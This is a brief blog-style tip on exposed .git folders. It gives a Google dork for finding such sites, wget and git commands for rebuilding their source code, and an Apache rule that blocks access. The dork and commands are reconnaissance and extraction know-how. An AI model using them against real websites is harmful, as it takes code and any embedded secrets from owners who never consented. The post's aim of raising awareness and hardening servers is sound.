Git is fantastic, but it could be dangerous. Let’s search for something on Google:

“.git” intitle:“Index of”

This Google dork will list of all websites which has their .git folders exposed to the web.

Git is not to be blamed here, but the poor server configurations. This may not be alarming to novice devs but we will be able to generate the entire score code using this trick. Let’s see how:

1. You can download the entire .git directory using wget: wget -r –no-parent http://example.com/.git
2. Run: git log and copy the recent commit hash:
3. And then the final command: git reset –hard <HASH>, in my case: git reset –hard 674d17771ad65bb73f4c6b96644d69d7ff19351b to restore the files

Server admins should add adequate config to protect the .git folder, ideally .git should never be part of build / hosted. Apache users can add the below line to your configuration to deny access to .git folder.

RewriteRule ^(.*/)?.git+ - [R=404,L]